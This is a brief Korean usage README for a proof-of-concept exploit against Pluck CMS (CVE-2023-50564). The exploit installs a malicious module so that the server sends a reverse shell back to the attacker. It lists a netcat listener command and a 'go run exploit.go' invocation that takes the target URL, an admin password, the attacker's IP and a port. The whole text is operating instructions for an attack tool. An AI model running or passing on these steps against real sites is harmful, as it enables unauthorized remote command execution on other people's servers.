
악성 모듈 설치를 통해 리버스 셸을 전달하는 Pluck CMS를 대상으로 하는 CVE-2023-50564 개념 증명 익스플로잇입니다.
먼저 리버스 셸을 위한 리스너를 설정합니다.
터미널 1
nc -nlvp <lport>
스크립트를 실행하면 pluck 모듈을 설치하여 리버스 셸을 우리에게 보내려고 시도합니다.
터미널 2
go run exploit.go -url <url> -password <passwd> -i <your-ip> -p <lport>